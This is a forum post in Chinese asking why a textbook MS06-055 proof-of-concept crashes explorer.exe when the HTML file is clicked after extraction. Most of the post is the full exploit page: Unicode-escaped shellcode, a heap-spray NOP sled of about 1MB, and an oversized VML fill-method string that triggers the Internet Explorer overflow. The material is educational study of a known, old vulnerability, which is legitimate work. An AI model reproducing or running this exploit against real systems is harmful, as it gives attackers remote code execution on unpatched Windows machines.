-
-
[旧帖] 为什么MS06-055的POC会导致explorer.exe出错 0.00雪花
-
发表于: 2016-6-28 07:46
-
也就是《0day》第27章的利用Heap Spray,用ie打开书中给出的实例exploit网页可以正常溢出。代码如下:
但是感觉这个exploit是特地放在压缩文件中,当解压这个MS06-055.html到文件夹中,稍微单击一下都会造成如下错误
选择调试是如下:
<!-----------------------------------------------------------------------------------
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code of chapter 14.2 in book "Vulnerability Exploit and Analysis Technique"
file name : MS06-055.html
author : failwest
date : 2007.10.22
description : demo show of heap spray technique with MS06-055
Noticed : this exploit can be launched on windows 2000 and windows XP SP1
which haven't patched MS06-055
this sample code may be detected as a threat file by some Antivirus product
version : 1.0
E-mail : failwest@gmail.com
Only for educational purposes enjoy the fun from exploiting :)
--------------------------------------------------------------------------------------->
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>failwest</title>
<style>
<!--v\:* { behavior: url(#default#VML); }-->
</style>
</head>
<script language="javascript">
var shellcode="\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857";
var nop="\u9090\u9090";
while (nop.length<= 0x100000/2)
{
nop+=nop;
}
nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );
var slide = new Array();
for (var i=0; i<200; i++)
{
slide[i] = nop + shellcode;
}
</script>
<body>
<v:rect style="width:444pt;height:444pt" fillcolor="black">
<v:fill method="ఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌ"/>
</v:rect>
</body>
</html>
但是感觉这个exploit是特地放在压缩文件中,当解压这个MS06-055.html到文件夹中,稍微单击一下都会造成如下错误
选择调试是如下:
